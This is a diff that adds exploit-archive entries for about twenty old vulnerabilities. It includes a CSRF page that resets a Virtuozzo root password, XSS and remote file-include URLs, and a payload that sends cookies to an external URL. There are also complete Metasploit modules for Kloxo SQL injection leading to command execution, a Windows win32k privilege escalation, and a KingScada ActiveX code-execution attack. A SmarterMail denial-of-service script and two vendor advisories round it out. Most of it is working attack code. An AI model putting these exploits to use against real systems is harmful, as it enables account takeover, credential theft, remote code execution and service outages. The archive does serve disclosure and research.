+source: http://www.securityfocus.com/bid/28593/info
+
+Parallels Virtuozzo Containers is prone to a cross-site request-forgery vulnerability.
+
+Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers.
+
+Virtuozzo Containers 3.0.0-25.4.swsoft is vulnerable; other versions are also affected. 
+
+<!-- poplix papuasia.org -- http://px.dynalias.org -- 04-02-2008 this file exploits a vulnerable installation of virtuozzo web panel by setting root password to "csrfsafepass" tested against Version 25.4.swsoft (build: 3.0.0-25.4.swsoft) perform the following steps to test it: 1. in this file replace 127.0.0.1 with target vps address 2. open a web browser and log into virtuozzo web interface 3. open this file in a new browser window and click the "change pwd" --> <form target=vrtifr name="defaultForm" method="post" action="https://127.0.0.1:4643/vz/cp/pwd"> <input type="hidden" name="passwd" value="csrfsafepass"> <input type="hidden" name="retype" value="csrfsafepass"> <input type="hidden" name="_submit" value="Change" > </form> <iframe style="width:1px;height:1px;visibility:hidden" name="vrtifr"></iframe> <input type=button value="change pwd" onclick="document.defaultForm.submit()"> 

platforms/php/webapps/31605.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28608/info
+
+Poplar Gedcom Viewer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Poplar Gedcom Viewer 2.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/poplar/index.php?genID=1&page=search&text="><script>alert("CANAKKALE-GECiLMEZ")</script>&ul=&start=0 http://www.example.com/poplar/index.php?genID=1&page=search&text=&ul="><script>alert("CANAKKALE-GECiLMEZ")</script>&start=0 

platforms/php/webapps/31606.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28609/info
+
+Glossaire is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Glossaire 2.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/glossaire2.0/glossaire.php?mode=2&limit1=0&limit2=4&letter=">

platforms/php/webapps/31608.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28612/info
+
+KwsPHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/Path/index.php?mod=ConcoursPhoto&VIEW=[XSS] 

platforms/php/webapps/31609.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28614/info
+
+Nuke ET is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data. Attackers will likely require access to a user account to perform attacks.
+
+Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
+
+Nuke ET 3.4 is vulnerable; other versions may also be affected. 
+
+<DIV 
+STYLE="width:expression(document.location='http://www.example.com/nuke/poc.php?cookie='+document.cookie);">
+

platforms/php/webapps/31610.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28615/info
+
+RobotStats is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+RobotStats 0.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/RobotStats_path/graph.php?DOCUMENT_ROOT=ZoRLu.txt?

platforms/php/webapps/31611.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28615/info
+ 
+RobotStats is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+ 
+RobotStats 0.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/RobotStats_path/robotstats.inc.php?DOCUMENT_ROOT=ZoRLu.txt? 

platforms/php/webapps/31614.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28630/info
+
+Tiny Portal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Tiny Portal 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?PHPSESSID=d0de2085c36edc6b8a5db1e7e8538e3b&action=tpmod;sa=shoutbox;shouts=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3 

platforms/unix/remote/31577.rb

@@ -0,0 +1,278 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  Rank = ManualRanking
+  PASSWORD_PREFIX = '__lxen:'
+  BASE64_RANGE = Rex::Text::AlphaNumeric + '+/='
+
+  attr_accessor :password
+  attr_accessor :session
+  attr_accessor :server
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Kloxo SQL Injection and Remote Code Execution',
+      'Description'    => %q{
+        This module exploits an unauthenticated SQL injection vulnerability affecting Kloxo, as
+        exploited in the wild on January 2014. The SQL injection issue can be abused in order to
+        retrieve the Kloxo admin cleartext password from the database. With admin access to the
+        web control panel, remote PHP code execution can be achieved by abusing the Command Center
+        function. The module tries to find the first server in the tree view, unless the server
+        information is provided, in which case it executes the payload there.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Unknown', # Discovery, exploit in the wild
+          'juan vazquez' # Metasploit Module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://vpsboard.com/topic/3384-kloxo-installations-compromised/'], # kloxo exploited in the wild
+          ['URL', 'http://www.webhostingtalk.com/showthread.php?p=8996984'],           # kloxo exploited in the wild
+          ['URL', 'http://forum.lxcenter.org/index.php?t=msg&th=19215&goto=102646']    # patch discussion
+        ],
+      'Arch'           => ARCH_CMD,
+      'Platform'       => 'unix',
+      'Payload'        =>
+        {
+          'Space'       => 262144, # 256k
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic perl python gawk bash-tcp netcat'
+            }
+        },
+      'Targets'        =>
+        [
+          ['Kloxo / CentOS', {}]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Jan 28 2014',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(7778),
+        OptString.new('TARGETURI', [true, 'The URI of the Kloxo Application', '/'])
+      ], self.class)
+
+    register_advanced_options(
+      [
+        OptString.new('SERVER_CLASS', [false, 'The server class']),
+        OptString.new('SERVER_NAME', [false, 'The server name'])
+      ], self.class)
+  end
+
+  def check
+    return Exploit::CheckCode::Safe unless webcommand_exists?
+    return Exploit::CheckCode::Safe if exploit_sqli(1, bad_char(0))
+    return Exploit::CheckCode::Safe unless pefix_found?
+
+    Exploit::CheckCode::Vulnerable
+  end
+
+  def exploit
+    fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited") unless check == Exploit::CheckCode::Vulnerable
+
+    print_status("#{peer} - Recovering the admin password with SQLi...")
+    loot = base64_password
+    fail_with(Failure::Unknown, "#{peer} - Failed to exploit the SQLi...") if loot.nil?
+    @password = Rex::Text.decode_base64(loot)
+    print_good("#{peer} - Password recovered: #{@password}")
+
+    print_status("#{peer} - Logging into the Control Panel...")
+    @session = send_login
+    fail_with(Failure::NoAccess, "#{peer} - Login with admin/#{@password} failed...") if @session.nil?
+
+    report_auth_info(
+      :host => rhost,
+      :port => rport,
+      :user => 'admin',
+      :pass => @password,
+      :type => 'password',
+      :sname => (ssl ? 'https' : 'http')
+    )
+
+    print_status("#{peer} - Retrieving the server name...")
+    @server = server_info
+    fail_with(Failure::NoAccess, "#{peer} - Login with admin/#{Rex::Text.decode_base64(base64_password)} failed...") if @server.nil?
+
+    print_status("#{peer} - Exploiting...")
+    send_command(payload.encoded)
+  end
+
+  def send_login
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.to_s, 'htmllib', 'phplib', ''),
+      'vars_post' =>
+        {
+          'frm_clientname' => 'admin',
+          'frm_password'   => @password,
+          'login'          => 'Login'
+        }
+    )
+
+    if res && res.code == 302 && res.headers.include?('Set-Cookie')
+      return res.get_cookies
+    end
+
+    nil
+  end
+
+  def server_info
+
+    unless datastore['SERVER_CLASS'].blank? || datastore['SERVER_NAME'].blank?
+      return { :class => datastore['SERVER_CLASS'], :name => datastore['SERVER_NAME'] }
+    end
+
+    res = send_request_cgi({
+      'uri'    => normalize_uri(target_uri.to_s, 'display.php'),
+      'cookie' => @session,
+      'vars_get' =>
+        {
+          'frm_action' => 'show'
+        }
+    })
+
+    if res && res.code == 200 && res.body.to_s =~ /<input type=hidden name="frm_subaction" value ="commandcenter">/
+      return parse_display_info(res.body.to_s)
+    end
+
+    nil
+  end
+
+  def parse_display_info(html)
+    server_info = {}
+    pos = html.index(/<input type=hidden name="frm_subaction" value ="commandcenter">/)
+
+    if html.index(/<input type=hidden name="frm_o_o\[\d+\]\[class\]" value ="(.*)">/, pos).nil?
+      return nil
+    else
+      server_info[:class] = $1
+    end
+
+    if html.index(/<input type=hidden name="frm_o_o\[\d+\]\[nname\]" value ="(.*)"> /, pos).nil?
+      return nil
+    else
+      server_info[:name] = $1
+    end
+
+    server_info
+  end
+
+  def send_command(command)
+    data = Rex::MIME::Message.new
+    data.add_part(@server[:class], nil, nil, 'form-data; name="frm_o_o[0][class]"')
+    data.add_part(@server[:name], nil, nil, 'form-data; name="frm_o_o[0][nname]"')
+    data.add_part(command, nil, nil, 'form-data; name="frm_pserver_c_ccenter_command"')
+    data.add_part('', nil, nil, 'form-data; name="frm_pserver_c_ccenter_error"')
+    data.add_part('updateform', nil, nil, 'form-data; name="frm_action"')
+    data.add_part('commandcenter', nil, nil, 'form-data; name="frm_subaction"')
+    data.add_part('Execute', nil, nil, 'form-data; name="frm_change"')
+
+    post_data = data.to_s
+    post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path.to_s, 'display.php'),
+      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
+      'cookie' => @session,
+      'data'   => post_data
+    }, 1)
+  end
+
+  def webcommand_exists?
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'lbin', 'webcommand.php'))
+
+    if res && res.code == 200 && res.body.to_s =~ /__error_only_clients_and_auxiliary_allowed_to_login/
+      return true
+    end
+
+    false
+  end
+
+  def pefix_found?
+    i = 1
+    PASSWORD_PREFIX.each_char do |c|
+      return false unless exploit_sqli(i, c)
+      i = i + 1
+    end
+
+    true
+  end
+
+  def bad_char(pos)
+    Rex::Text.rand_text_alpha(1, PASSWORD_PREFIX[pos])
+  end
+
+  def ascii(char)
+    char.unpack('C')[0]
+  end
+
+  def base64_password
+    i = PASSWORD_PREFIX.length + 1
+    loot = ''
+
+    until exploit_sqli(i, "\x00")
+      vprint_status("#{peer} - Bruteforcing position #{i}")
+      c = brute_force_char(i)
+      if c.nil?
+        return nil
+      else
+        loot << c
+      end
+      vprint_status("#{peer} - Found: #{loot}")
+      i = i + 1
+    end
+
+    loot
+  end
+
+  def brute_force_char(pos)
+    BASE64_RANGE.each_char do |c|
+      return c if exploit_sqli(pos, c)
+    end
+
+    nil
+  end
+
+  def exploit_sqli(pos, char)
+    # $1$Tw5.g72.$/0X4oceEHjGOgJB/fqRww/ == crypt(123456)
+    sqli = "al5i' "
+    sqli << "union select '$1$Tw5.g72.$/0X4oceEHjGOgJB/fqRww/' from client where "
+    sqli << "ascii(substring(( select realpass from client limit 1),#{pos},1))=#{ascii(char)}#"
+
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.to_s, 'lbin', 'webcommand.php'),
+      'vars_get' =>
+        {
+          'login-class'    => 'client',
+          'login-name'     => sqli,
+          'login-password' => '123456'
+        }
+    )
+
+    if res && res.code == 200 && res.body.blank?
+      return true
+    elsif res && res.code == 200 && res.body.to_s =~ /_error_login_error/
+      return false
+    end
+
+    vprint_warning("#{peer} - Unknown fingerprint while exploiting SQLi... be careful")
+    false
+  end
+
+end

platforms/windows/dos/31585.c

@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/28554/info
+
+Microsoft Windows is prone to a local privilege-escalation vulnerability.
+
+The vulnerability resides in the Windows kernel. A locally logged-in user can exploit this issue to gain kernel-level access to the operating system.
+
+#include 
+#include 
+
+int main(int argc,char *argv[])
+{
+    DWORD    dwHookAddress = 0x80000000;
+
+    printf( "\tMS08-025 Local Privilege Escalation Vulnerability Exploit(POC)\n\n" );
+        printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/04/10\n" );
+
+    SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress );
+    return 0;
+}

platforms/windows/dos/31592.txt

@@ -0,0 +1,35 @@
+source: http://www.securityfocus.com/bid/28580/info
+
+Microsoft Internet Explorer is prone to a denial-of-service vulnerability.
+
+An attacker may exploit this issue by enticing victims into opening a maliciously crafted webpage.
+
+Successfully exploiting this issue will allow attackers to crash the application, denying service to legitimate users.
+
+This issue affects Microsoft Internet Explorer 8 Beta 1. 
+
+<script>
+
+// trying prototype hijacking here.
+
+xdr = XDomainRequest;
+
+XDomainRequest = function() 
+
+return new XDomainRequest();
+
+}
+
+
+
+ping = 'hello';
+
+xdr = new XDomainRequest(); 
+
+xdr.open("POST", "http://cnn.com"); 
+
+xdr.send(ping);
+
+
+
+</script>

platforms/windows/dos/31593.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28581/info
+
+Microsoft Internet Explorer is prone to a script-injection vulnerability when handling specially crafted requests to 'acr_error.htm' via the 'res://' protocol. The file resides in the 'ieframe.dll' dynamic-link library.
+
+An attacker may leverage this issue to execute arbitrary code in the context of a user's browser. Successful exploits can allow the attacker to steal cookie-based authentication credentials, obtain potentially sensitive information stored on the victim's computer, and launch other attacks.
+
+Internet Explorer 8 is vulnerable. Internet Explorer 7 is likely vulnerable as well, but this has not been confirmed.
+
+res://ieframe.dll/acr_error.htm#<h1>foo</h1>,<h1>foo</h1> res://ieframe.dll/acr_error.htm#<iframe/src=''/onload='javascript:document.write("<iframe/src=\"file://localhost/test.txt\"></iframe>")'></iframe>,foo res://ieframe.dll/acr_error.htm#<iframe/src=''/onload='javascript:document.write("<script/src=http://www.example.com/></script>")'></iframe>,foo res://ieframe.dll/acr_error.htm#<iframe/src=''/onload='javascript:document.location="file://..\\ServerName\\pipe\\PipeName"'></iframe>,foo 

platforms/windows/dos/31607.py

@@ -0,0 +1,71 @@
+source: http://www.securityfocus.com/bid/28610/info
+
+SmarterTools SmarterMail is prone to a denial-of-service vulnerability when handling specially crafted HTTP GET, HEAD, PUT, POST, and TRACE requests. When the server eventually resets the request connection, it will crash.
+
+Remote attackers can exploit this issue to deny service to legitimate users.
+
+SmarterMail 5.0 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/python
+##########################################################################
+#
+# SmarterMail Web Server 5.0 DoS exploit
+# Tested on version 5.0.2999, OS: Windows XPSP2 English
+# Tested with GET,HEAD,PUT,POST,TRACE
+#
+# Bug discovered by Matteo Memelli aka ryujin
+# http://www.gray-world.net http://www.be4mind.com
+#
+##########################################################################
+#
+# bt ~ # ./smartermail_dos.py -H 192.168.1.245 -P 9998
+# [+] Connecting to 192.168.1.245 on port 9998
+# [+] Starting DoS attack, it can take some minutes...
+# [+] Evil buf sent!
+# [+] Now we must wait for a connection reset to crash the server...
+# [+] Server Di3d:  Connection reset by peer
+# [+] The attack took 113 secs
+#
+##########################################################################
+
+from socket import *
+from optparse import OptionParser
+import sys, time
+
+usage =  "%prog -H TARGET_HOST -P TARGET_PORT [-c COMMAND]"
+parser = OptionParser(usage=usage)
+parser.add_option("-H", "--target_host", type="string",
+                  action="store", dest="HOST",
+                  help="Target Host")
+parser.add_option("-P", "--target_port", type="int",
+                  action="store", dest="PORT",
+                  help="Target Port")
+(options, args) = parser.parse_args()
+HOST    = options.HOST
+PORT    = options.PORT
+if not (HOST and PORT):
+   parser.print_help()
+   sys.exit()
+
+payload = 'A'*8784
+print "[+] Connecting to %s on port %d" % (HOST, PORT)
+print "[+] Starting DoS attack, it can take some minutes..."
+timestart = time.time()
+s = socket(AF_INET, SOCK_STREAM)
+s.connect((HOST, PORT))
+s.send('TRACE ' + payload+"\r\n\r\n")
+print "[+] Evil buf sent!"
+print "[+] Now we must wait for a connection reset to crash the 
+server..."
+
+# IF WE DONT WAIT FOR A CONNECTION RESET THE SERVER WONT CRASH
+try:
+   data=s.recv(1024)
+except error,e:
+   print "[+] Server Di3d: ", e[1]
+   print "[+] The attack took %d secs" % int(time.time() - timestart)
+else:
+   print "[-] Attack was not successful!" 
+   s.close()
+
+

platforms/windows/local/31576.rb

@@ -0,0 +1,133 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/reflective_dll_injection'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = AverageRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'           => 'Windows TrackPopupMenuEx Win32k NULL Page',
+      'Description'    => %q{
+        This module exploits a vulnerability in win32k.sys where under
+        specific conditions TrackPopupMenuEx will pass a NULL pointer to
+        the MNEndMenuState procedure. This module has been tested
+        successfully on Windows 7 SP0 and Windows 7 SP1.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Seth Gibson', # vulnerability discovery
+          'Dan Zentner', # vulnerability discovery
+          'Matias Soler', # vulnerability analysis
+          'Spencer McIntyre'
+        ],
+      'Arch'           => ARCH_X86,
+      'Platform'       => 'win',
+      'SessionTypes'   => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Targets'        =>
+        [
+          [ 'Windows 7 SP0/SP1', { } ]
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 4096,
+          'DisableNops' => true
+        },
+      'References'     =>
+        [
+          [ 'CVE', '2013-3881' ],
+          [ 'OSVDB', '98212' ],
+          [ 'BID', '62830'],
+          [ 'MSB', 'MS13-081' ],
+          [ 'URL', 'http://endgame.com/news/microsoft-win32k-null-page-vulnerability-technical-analysis.html' ],
+          [ 'URL', 'http://immunityproducts.blogspot.com/2013/11/exploiting-cve-2013-3881-win32k-null.html' ]
+        ],
+      'DisclosureDate' => 'Oct 08 2013',
+      'DefaultTarget'  => 0
+    }))
+  end
+
+  def check
+    os = sysinfo["OS"]
+    if (os =~ /windows/i) == nil
+      return Exploit::CheckCode::Unknown
+    end
+
+    file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
+    major, minor, build, revision, branch = file_version(file_path)
+    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+
+    case build
+    when 7600
+      return Exploit::CheckCode::Vulnerable
+    when 7601
+      return Exploit::CheckCode::Vulnerable if revision <= 18126
+    when 9200
+      return Exploit::CheckCode::Safe
+    end
+    return Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Exploit::Failure::None, 'Session is already elevated')
+    end
+
+    if check != Exploit::CheckCode::Vulnerable
+      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
+    end
+
+    if sysinfo["Architecture"] =~ /wow64/i
+      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
+    elsif sysinfo["Architecture"] =~ /x64/
+      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
+    end
+
+    print_status("Launching notepad to host the exploit...")
+    notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
+    begin
+      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+      print_good("Process #{process.pid} launched.")
+    rescue Rex::Post::Meterpreter::RequestError
+      # Reader Sandbox won't allow to create a new process:
+      # stdapi_sys_process_execute: Operation failed: Access is denied.
+      print_status("Operation failed. Trying to elevate the current process...")
+      process = client.sys.process.open
+    end
+
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+    library_path = ::File.join(Msf::Config.data_directory, "exploits",
+                               "cve-2013-3881", "cve-2013-3881.x86.dll")
+    library_path = ::File.expand_path(library_path)
+
+    print_status("Injecting exploit into #{process.pid}...")
+    exploit_mem, offset = inject_dll_into_process(process, library_path)
+
+    print_status("Exploit injected. Injecting payload into #{process.pid}...")
+    payload_mem = inject_into_process(process, payload.encoded)
+
+    # invoke the exploit, passing in the address of the payload that
+    # we want invoked on successful exploitation.
+    print_status("Payload injected. Executing exploit...")
+    process.thread.create(exploit_mem + offset, payload_mem)
+
+    print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
+  end
+
+end

platforms/windows/remote/31575.rb

@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'KingScada kxClientDownload.ocx ActiveX Remote Code Execution',
+      'Description'    => %q{
+        This module abuses the kxClientDownload.ocx ActiveX control distributed with WellingTech KingScada.
+        The ProjectURL property can be abused to download and load arbitrary DLLs from
+        arbitrary locations, leading to arbitrary code execution, because of a dangerous
+        usage of LoadLibrary. Due to the nature of the vulnerability, this module will work
+        only when Protected Mode is not present or not enabled.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Andrea Micalizzi',  # aka rgod original discovery
+          'juan vazquez'       # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2013-2827'],
+          ['OSVDB', '102135'],
+          ['BID', '64941'],
+          ['ZDI', '14-011'],
+          ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01']
+        ],
+      'DefaultOptions' =>
+        {
+          'InitialAutoRunScript' => 'migrate -f',
+        },
+      'BrowserRequirements' =>
+        {
+          :source      => /script|headers/i,
+          :os_name     => Msf::OperatingSystems::WINDOWS,
+          :ua_name     => /MSIE|KXCLIE/i
+        },
+      'Payload'        =>
+        {
+          'Space'           => 2048,
+          'StackAdjustment' => -3500,
+          'DisableNopes'    => true
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 14 2014'))
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Requested: #{request.uri}")
+
+    if request.uri =~ /\/libs\/.*\.dll/
+      print_good("Sending DLL payload")
+      send_response(cli,
+        generate_payload_dll(:code => get_payload(cli, target_info)),
+        'Content-Type' => 'application/octet-stream'
+      )
+      return
+    elsif request.uri =~ /\/libs\//
+      print_status("Sending not found")
+      send_not_found(cli)
+      return
+    end
+
+    content = <<-EOS
+<html>
+<body>
+<object classid='clsid:1A90B808-6EEF-40FF-A94C-D7C43C847A9F' id='#{rand_text_alpha(10 + rand(10))}'>
+<param name="ProjectURL" value="#{get_module_uri}"></param>
+</object>
+</body>
+</html>
+    EOS
+
+    print_status("Sending #{self.name}")
+    send_response_html(cli, content)
+  end
+
+end

platforms/windows/webapps/31578.txt

@@ -0,0 +1,85 @@
+Trustwave's SpiderLabs Security Advisory TWSL2014-003:
+Blind SQL Injection Vulnerability in Tableau Server
+
+Published: 02/07/14
+Version: 1.1
+
+Vendor: Tableau Software (http://www.tableausoftware.com)
+Product: Tableau Server
+Versions affected:  8.1.X before 8.1.2 and 8.0.X before 8.0.7. Not present
+in 7.0.X and earlier.
+
+Product description:
+Tableau Server is a business intelligence application that provides
+browser-based analytics.
+
+Finding: Blind SQL Injection
+Credit: Tanya Secker & Christiaan Esterhuizen of Trustwave SpiderLabs
+CVE: CVE-2014-1204
+CWE: CWE-89
+
+It is possible for an authenticated user or guest user (if enabled) to
+inject arbitrary SQL into the Tableau Server backend database. As a
+proof of concept the default database user (Zrails) was retrieved using the
+following payload:
+
+http://127.0.0.1/views?modified_after=2013-12-08T23%3A00%3A00.000Z'%20or%20user%20like%20'Zrails
+
+The database appears to be Oracle and both the modified_after and
+modified_before parameters are vulnerable.
+
+
+Remediation Steps:
+The vendor has released a fix in version 8.1.2 and version 8.0.7. Version
+7.0.X is not affected.
+
+Revision History:
+12/06/13 - Vulnerability disclosed
+12/06/13 - Vendor responded
+12/23/13 - Patch released by vendor
+01/24/14 - Advisory published
+02/07/14 - Advisory revision published
+
+
+About Trustwave:
+Trustwave is the leading provider of on-demand and subscription-based
+information security and payment card industry compliance management
+solutions to businesses and government entities throughout the world. For
+organizations faced with today's challenging data security and compliance
+environment, Trustwave provides a unique approach with comprehensive
+solutions that include its flagship TrustKeeper compliance management
+software and other proprietary security solutions. Trustwave has helped
+thousands of organizations--ranging from Fortune 500 businesses and large
+financial institutions to small and medium-sized retailersómanage
+compliance and secure their network infrastructure, data communications and
+critical information assets. Trustwave is headquartered in Chicago with
+offices throughout North America, South America, Europe, Africa, China and
+Australia. For more information, visit https://www.trustwave.com
+
+
+About Trustwave's SpiderLabs:
+SpiderLabs(R) is the advanced security team at Trustwave focused on
+application security, incident response, penetration testing, physical
+security and security research. The team has performed over a thousand
+incident investigations, thousands of penetration tests and hundreds of
+application security tests globally. In addition, the SpiderLabs Research
+team provides intelligence through bleeding-edge research and proof of
+concept tool development to enhance Trustwave's products and services.
+https://www.trustwave.com/spiderlabs
+
+
+Disclaimer:
+The information provided in this advisory is provided "as is" without
+warranty of any kind. Trustwave disclaims all warranties, either express or
+implied, including the warranties of merchantability and fitness for a
+particular purpose. In no event shall Trustwave or its suppliers be liable
+for any damages whatsoever including direct, indirect, incidental,
+consequential, loss of business profits or special damages, even if
+Trustwave or its suppliers have been advised of the possibility of such
+damages. Some states do not allow the exclusion or limitation of liability
+for consequential or incidental damages so the foregoing limitation may not
+apply.
+
+________________________________
+
+This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.

platforms/windows/webapps/31579.txt

@@ -0,0 +1,96 @@
+"Titan FTP Server Directory Traversal Vulnerabilities"
+ 
+******************************************************************************
+ 
+- Affected Vendor: South River Technologies
+- Affected System: Titan FTP Server software (Version 10.32 Build 1816)
+- Vendor Disclosure Date: January 27th, 2014
+- Public Disclosure Date: February 10h, 2014
+- Vulnerabilities' Status: Fixed
+ 
+******************************************************************************
+ 
+Associated CVEs:
+ 
+1) CVE-2014-1841:
+   It is possible to copy the complete home folder of another user by leveraging a vulnerability on the Titan FTP Server Web Interface.
+ 
+2) CVE-2014-1842:
+   It is possible to obtain the complete list of existing users by writing "/../" on the search bar.
+ 
+3) CVE-2014-1843:
+   It is possible to observe the "Properties" for an existing user home folder.
+   This also allows for enumeration of existing users on the system.
+ 
+Associated CWE:
+ 
+  CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
+  http://cwe.mitre.org/data/definitions/22.html
+ 
+******************************************************************************
+ 
+DESCRIPTIONS
+============
+ 
+1) CVE-2014-1841:
+ 
+   It is possible to copy the complete home folder of another user by leveraging a vulnerability on the Titan FTP Server Web Interface.
+   
+   This is done by using the "Move" function, and replacing the "src" parameter value with the "/../<folder name of another user>" value.   
+ 
+2) CVE-2014-1842:
+ 
+   It is possible to obtain the complete list of existing users by writing "/../" on the search bar and hitting the "Go" button.
+ 
+3) CVE-2014-1843:
+ 
+   It is possible to observe the "Properties" for an existing user home folder.
+   
+   This also allows for enumeration of existing users on the system.
+   
+   This is done by using the "Properties" function, and replacing the "src" parameter value with the "/../<folder name of another user>" value.   
+ 
+******************************************************************************
+ 
+- Available fix:
+  Titan FTP Server software (Version 10.40 Build 1829):
+   + titanftp32_10_40_1829_en.exe
+   + titanftp64_10_40_1829_en.exe
+ 
+- Related Links: Deloitte Argentina - www.deloitte.com/ar
+ 
+- Feedback:
+  If you have any questions, comments, concerns, updates or suggestions please contact:
+   + Fara Rustein
+     frustein@deloitte.com (Twitter: @fararustein)
+   + Luciano Martins
+     lmartins@deloitte.com (Twitter: @clucianomartins)
+ 
+******************************************************************************
+ 
+Credits:
+ 
+CVE-2014-1841:
+  1. It is possible to copy the complete home folder of another user by leveraging a vulnerability on the Titan FTP Server Web Interface.
+  Discovered by Fara Rustein - frustein@deloitte.com
+ 
+CVE-2014-1842:
+  2. It is possible to obtain the complete list of existing users by writing "/../" on the search bar.
+  Discovered by Luciano Martins - lmartins@deloitte.com
+ 
+CVE-2014-1843:
+  3. It is also possible to observe the "Properties" for an existing user home folder.
+  This also allows for enumeration of existing users on the system.
+  Discovered by Fara Rustein - frustein@deloitte.com
+  
